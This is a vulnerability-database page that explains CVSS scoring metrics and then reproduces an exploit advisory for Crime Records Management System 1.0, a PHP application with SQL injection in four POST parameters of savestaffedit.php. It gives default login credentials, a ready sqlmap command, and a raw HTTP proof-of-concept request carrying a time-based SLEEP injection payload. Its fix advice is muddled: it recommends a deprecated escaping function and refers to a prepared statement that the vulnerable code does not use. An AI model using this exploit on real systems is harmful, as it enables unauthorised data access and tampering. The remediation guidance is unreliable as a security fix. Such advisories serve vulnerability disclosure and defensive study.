The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: Crime Records Management System 1.0 SQL Injection
# Exploit Title: Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)
# Date: 17/08/2021
# Exploit Author: Davide 't0rt3ll1n0' Taraschi
# Vendor Homepage: https://www.sourcecodester.com/users/osman-yahaya
# Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
# Version: 1.0
# Testeted on: Linux (Ubuntu 20.04) using LAMPP
## Impact:
An authenticated user may be able to read data for which is not authorized, tamper with or destroy data, or possibly even read/write files or execute code on the database server.
## Description:
All four parameters passed via POST are vulnerable:
`fname` is vulnerable both to boolean-based blind and time-based blind SQLi
`oname` is vulnerable both to boolean-based blind and time-based blind SQLi
`username` is only vulnerable to time-based blind SQLi
`status` is vulnerable both to boolean-based blind and time-based blind SQLi
## Remediation:
Here is the vulnerable code:
if($status==''){
mysqli_query($dbcon,"update userlogin set surname='$fname', othernames='$oname' where staffid='$staffid'")or die(mysqli_error());
}
if(!empty($status)){
mysqli_query($dbcon,"update userlogin set surname='$fname',status='$status', othernames='$oname' where staffid='$staffid'")or die(mysqli_error());
}
As you can see the parameters described above are passed to the code without being checked, this lead to the SQLi.
To patch this vulnerability, i suggest to sanitize those variables via `mysql_real_escape_string()` before being passed to the prepared statement.
## Exploitation through sqlmap
1) Log into the application (you can try the default creds 1111:admin123)
2) Copy your PHPSESSID cookie
3) Launch the following command:
sqlmap --method POST -u http://$target/ghpolice/admin/savestaffedit.php --data="fname=&oname=&username=&status=" --batch --dbs --cookie="PHPSESSID=$phpsessid"
replacing $target with your actual target and $phpsessid with the cookie that you had copied before
## PoC:
Request:
POST /ghpolice/admin/savestaffedit.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/ghpolice/admin/user.php
Cookie: PHPSESSID=f7123ac759cd97868df0f363434c423f
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
fname=' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- &oname=&username=&status=
And after 5 seconds we got:
HTTP/1.1 200 OK
Date: Tue, 17 Aug 2021 14:28:59 GMT
Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1
X-Powered-By: PHP/7.4.22
Content-Length: 1074
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
etc...